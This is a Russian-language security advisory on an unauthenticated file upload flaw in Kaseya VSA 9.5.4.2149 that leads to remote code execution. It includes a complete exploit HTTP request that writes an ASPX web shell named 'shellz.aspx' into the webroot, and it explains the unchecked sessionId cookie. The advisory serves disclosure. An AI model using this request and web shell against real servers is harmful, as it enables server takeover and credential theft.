Злоумышленник может загружать файлы с привилегиями процесса веб-сервера для Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 и впоследствии использовать эти файлы для выполнения команд asp. API /SystemTab/uploader.aspx уязвим для неаутентифицированной произвольной загрузки файлов, приводящей к RCE. Злоумышленник может загружать файлы с привилегиями процесса веб-сервера и впоследствии использовать эти файлы для выполнения команд asp. Подробное описание: Дан следующий запрос: POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> Злоумышленник может контролировать имя файла, записываемого через параметр qqfile, и местоположение файла, записываемого через параметр PathData. Даже несмотря на то, что вызов требует передачи cookie sessionId, мы определили, что sessionId фактически не проверяется и любое числовое значение принимается как действительное. Обнаружены проблемы безопасности: * cookie sessionId требуется /SystemTab/uploader.aspx, но фактически не проверяется, что позволяет злоумышленнику обходить аутентификацию * /SystemTab/uploader.aspx позволяет злоумышленнику создавать файл с произвольным содержимым в любом месте, куда веб-сервер имеет доступ для записи * Процесс веб-сервера имеет доступ для записи в веб-корень, где злоумышленник может выполнить его, запросив URL-адрес вновь созданного файла. Воздействие: Эта произвольная загрузка файлов позволяет злоумышленнику размещать файлы по своему выбору в любом месте на жестком диске сервера, к которому имеет доступ процесс веб-сервера, включая (но не ограничиваясь) веб-корень. Если злоумышленник загружает файлы с кодом в веб-корень (например, код aspx), он может затем выполнить этот код в контексте веб-сервера, чтобы нарушить либо целостность, конфиденциальность, либо доступность системы, либо украсть учетные данные других пользователей. Другими словами, это может привести к полному компрометации системы.